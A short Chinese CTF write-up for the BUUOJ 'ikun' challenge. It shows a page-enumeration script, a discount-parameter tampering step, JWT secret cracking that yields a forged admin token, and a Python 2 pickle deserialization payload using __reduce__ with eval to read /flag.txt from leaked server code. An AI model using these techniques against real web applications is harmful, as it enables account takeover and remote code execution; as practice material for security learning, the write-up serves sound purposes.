[华北赛区]ikun
爆lv6
import requests
for i in range(512):
url = f"http://78cd9dcd-96d8-4fb8-9785-be448ad9dc9e.node3.buuoj.cn/shop?page={i}"
response = requests.get(url=url)
if response.text.find("lv6.png") != -1:
print(i)
break
在181页,抓包修改折扣倍率,跳转到b1g_m4mber,提示需要admin才能访问,抓包发现是JWT认证。
使用c-jwt-cracker爆破
$ docker build . -t jwtcrack
$ docker run -it --rm jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imd1ZXN0In0.dDz06h0lkd5_0DT8vUVcGLBGvX2btxx2AyJJCQWkEoQ
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-wM1ZSwax3ivRK4j54jlaXv-1JjQynjo

有源码泄露,在Admin.py中找到反序列化点。
import tornado.web
from sshop.base import BaseHandler
import pickle
import urllib
class AdminHandler(BaseHandler):
@tornado.web.authenticated
def get(self, *args, **kwargs):
if self.current_user == "admin":
return self.render('form.html', res='This is Black Technology!', member=0)
else:
return self.render('no_ass.html')
@tornado.web.authenticated
def post(self, *args, **kwargs):
try:
become = self.get_argument('become')
p = pickle.loads(urllib.unquote(become))
return self.render('form.html', res=p, member=1)
except:
return self.render('form.html', res='This is Black Technology!', member=0)
__reduce__方法在反序列化时被调用,类似PHP的wakeup,参考王叹之的脚本。
import pickle
import urllib
class payload(object):
def __reduce__(self):
return (eval, ("open('/flag.txt','r').read()",))
a = pickle.dumps(payload())
a = urllib.quote(a)
print a
比较重要的是这题的环境是python2的,python2和python3的反序列化是不一样的,当时卡了比较久。
Last modified 8mo ago